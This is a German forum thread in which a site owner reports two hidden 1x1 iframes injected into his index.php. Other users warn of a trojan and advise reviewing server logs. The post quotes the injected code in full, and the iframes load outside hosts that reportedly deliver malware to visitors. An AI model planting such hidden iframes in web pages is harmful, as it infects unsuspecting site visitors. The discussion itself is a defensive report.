Website mit Trojaner beladen!?

Julian Ulrich

Angesehenes Mitglied
Hallo,

In die index.php meiner Website www.wcheck.com hat jemand folgenden Code geschrieben:
<iframe src="http://iframetraff.biz/dl/adv443.php" width=1 height=1>
</iframe>
<iframe src="http://www.wakayama-info.net/board/includes/top/9094/index.html" width=1 height=1></iframe>

So installiert sich automatisch ein Trojaner beim Betreten der Seite,
zum Glück scheint das erst heute Nacht passiert zu sein und ich konnte ihn soeben entfernen.

Wer will mich da fertigmachen?
Was kann ich tun?

lg, julian
 
Da scheint es jemand auf dich abgesehen zu haben. Zuerst Adsense und jetzt das
sad.gif


Achtung: Kommt nicht auf die dumme Idee, die angegebenen Links einzugeben, es wird beim IE tatsächlich der Trojaner "Wonka" installiert.
rolleyes.gif
 
QUOTE (Alain Aubert @ Fr 11.11.2005, 12:45) Als erstes schaust Du Dir alle Serverlogs genau an.

Ja stimmt das werde ich tun, hoffentlich kann ich da irgendwas ablesen...
 
Julian,
Hast du schon Resultate. Ich bin an deiner Logauswertung interessiert.

Mit besten Grüssen
Boubou7
 
QUOTE Achtung: Kommt nicht auf die dumme Idee, die angegebenen Links einzugeben, es wird beim IE tatsächlich der Trojaner "Wonka" installiert.

nicht nur im IE sondern auch im Firefox !!!!
 
QUOTE (Metaman @ Di 22.11.2005, 21:07)
QUOTE Achtung: Kommt nicht auf die dumme Idee, die angegebenen Links einzugeben, es wird beim IE tatsächlich der Trojaner "Wonka" installiert.

nicht nur im IE sondern auch im Firefox !!!!

es gibt dinge, die sollte man einfach nicht ausprobieren....

erinnert mich an die kindheit... hinter diese türe darfst du nicht schauen.... oder doch eher an die neugierde einer frau
biggrin.gif


ric

 
QUOTE es gibt dinge, die sollte man einfach nicht ausprobieren....

stimmt,
aber die Versuchung war stärker :)

dazu kommt ,das ich derzeit auch etwas mit dem Virenschutz teste.
ich bin von Antivir auf Avast umgestiegen. Und da nutze ich solche möglichkeiten gerne zum testen
 
Zurück
Oben